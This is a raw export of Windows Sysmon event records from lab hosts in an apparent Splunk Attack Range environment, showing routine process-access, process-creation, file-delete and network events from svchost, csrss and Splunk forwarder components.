07:48:31.971{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080987Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:31.971{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080986Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:31.971{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080985Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:31.971{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080984Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:31.971{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080983Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:31.971{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080982Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:31.971{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080981Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:31.971{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B1CF-615A-3501-00000000FD01}172C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080980Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:31.971{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B1CF-615A-3501-00000000FD01}172C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000080979Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:31.973{2FDD8D40-B1CF-615A-3501-00000000FD01}172C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000080978Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:31.674{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3D8AFECC7D7D1781B307ABF55DACA93,SHA256=B472A49CCF4FB6B8367BBE0BDB66A371C98A49947AD867060C5E2BB1148224E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103128Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:31.842{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38F7FEE70193C229818131D510D2B755,SHA256=F4FF5E1F97D4115EA385615C3B45DFDCDE330B96E6B0F580E99869C20A2DA64E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103127Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:30.483{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49494-false10.0.1.12-8000- 10341000x800000000000000080977Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:31.471{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B1CF-615A-3401-00000000FD01}3624C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080976Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:31.471{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080975Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:31.471{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080974Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:31.471{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080973Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:31.471{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080972Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:31.471{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080971Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:31.471{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080970Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:31.471{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080969Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:31.471{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080968Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:31.471{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080967Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:31.471{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B1CF-615A-3401-00000000FD01}3624C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080966Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:31.471{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B1CF-615A-3401-00000000FD01}3624C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000080965Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:31.472{2FDD8D40-B1CF-615A-3401-00000000FD01}3624C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000080995Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:32.909{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=384EBC0BB62FB8B2647B55ED4055B36F,SHA256=4F89A40F1893FC0C0D9E94EDD9AD87E91505137DA3FDB70C6470A4CFF7DD541B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103130Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:32.858{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B513DC8D0F235D3A31537A182362689,SHA256=41A4FDC587EAD7B7281ED9EA02CC890BC351184AABA0161AC0DF61FDFDE9B46C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080994Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:32.487{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=223210C797BC5A5D9CF1BD1BECFC035C,SHA256=2E83486C3BE5792B5171809289A31B701BAC578DE3F9C0B026CB9D3B2C473EB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080993Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:32.487{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program 